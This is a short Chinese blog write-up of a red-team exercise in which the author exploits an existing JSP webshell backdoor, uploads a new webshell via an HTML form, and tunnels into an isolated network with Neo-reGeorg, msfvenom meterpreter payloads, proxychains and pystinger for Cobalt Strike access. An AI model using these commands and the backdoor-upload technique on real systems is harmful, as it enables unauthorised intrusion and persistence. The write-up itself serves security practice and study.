记一次失败的打点

admin 2022-07-20 13:22:29 AnQuanKeINFO 来源:ZONE.CI 全球网 0 阅读模式

 

背景

在某次攻防演练的晚上,大佬给我一个网站,说有一个RCE漏洞打一下试试,抱着试试就逝世的心态,进行了打点行动。

 

上传webshell

在web目录发现了一个已存在木马xx.jsp

<%if(request.getParameter("f".getBytes());%>< a href="One_OK"></ a>

利用已经存在的上传后门,构建一个HTML表单来上传我们的自己木马

<form action="http://xx.x.x.x:8080/scdc/xx.jsp?f=fuckjp.jsp" method="post">  
    <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
    <input type=submit value="提交">  
</form>

目标不出网,无法外联

 

neoreg

还原大致流程

生成neoreg

py -2 neoreg.py generate -k password

上传&验证

py -2 neoreg.py -k password -u http://192.168.11.132/3.php

msf上线

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9001 -f exe -o reverse.exe

gedit /etc/proxychains4.conf

proxychains4 msfconsole

 

CS上线

pystinger

蚁剑上传proxy.phpstinger_server.exe并执行 start stinger_server.exe

攻击机执行

stinger_client.exe -w http://192.168.11.132/proxy.php -l 127.0.0.1 -p 60000

设置监听

上线

 

结束语

最后不幸被蓝队发现,痛失权限,打点失败。

weinxin
特别声明
本站(ZONE.CI)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
记一次失败的打点 AnQuanKeINFO

记一次失败的打点

背景在某次攻防演练的晚上,大佬给我一个网站,说有一个RCE漏洞打一下试试,抱着试试就逝世的心态,进行了打点行动。 上传webshell在web目录发现了一个已存在木马xx.jsp<
初探逻辑分析仪 AnQuanKeINFO

初探逻辑分析仪

0x01 前言前段时间采购了个逻辑分析仪,之前对数字信号、芯⽚间通信等接触也不多,近几日恶补了一下,现以文字记录下来以便后续查阅。 0x02 什么是逻辑分析仪逻辑分析仪简介逻辑分析
评论:0   参与:  0